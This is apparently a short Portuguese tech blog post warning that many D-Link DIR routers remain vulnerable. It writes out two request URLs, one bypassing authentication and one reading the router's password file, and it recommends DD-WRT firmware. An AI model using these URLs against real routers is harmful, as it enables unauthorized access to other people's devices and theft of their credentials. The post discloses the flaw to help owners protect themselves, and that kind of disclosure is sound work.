D-Link

 

A D-Link prometeu corrigir as vulnerabilidades detectadas em alguns dos seus roteadores, mas infelizmente, ao que tudo indica, ainda há muitos modelos que seguem com graves vulnerabilidades que podem ser facilmente exploradas.

Alguns usuários pesquisaram na internet sobre essas vulnerabilidades, e em poucos minutos de busca no Google foi apresentada uma forma que permite a visualização do login e senha dos roteadores. E, ao que parece, a técnica é válida para todos os routers D-Link DIR.

A vulnerabilidade é bem simples. Basta acessar os seguintes endereços:

 

http://ip_do_router/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
http://ip_do_router/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

 

Uma das soluções é instalar um firmware alternativo no roteador (o DD-WRT), que apesar de não ser 100% seguro, não tem uma vulnerabilidade tão flagrante. O que complica é que o fabricante não lança uma firmware que resolve o problema de vez.

De qualquer forma, fica a dica.

Se você pensa em trocar de roteador ou apenas avaliar a segurança do seu modelo atual, vale a pena pesquisar por vulnerabilidades desse modelo, para não deixar a porta aberta para hackers e malwares.